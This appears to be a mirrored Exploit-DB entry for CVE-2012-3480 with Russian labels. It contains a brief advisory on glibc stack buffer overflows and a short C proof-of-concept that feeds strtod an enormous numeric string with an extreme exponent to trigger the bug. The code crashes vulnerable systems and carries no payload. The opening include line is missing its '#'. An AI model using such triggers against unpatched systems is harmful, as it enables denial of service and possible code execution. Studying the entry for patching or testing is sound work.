- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 37631
- Проверка EDB
-
- Пройдено
- Автор
- JOSEPH S. MYER
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2012-3480
- Дата публикации
- 2012-08-13
GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities
C:
// source: https://www.securityfocus.com/bid/54982/info
GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition.
include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror ("malloc");
exit (EXIT_FAILURE);
}
p[0] = '1';
memset (p + 1, '0', SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf ("%a\n", d);
exit (EXIT_SUCCESS);
}- Источник
- www.exploit-db.com
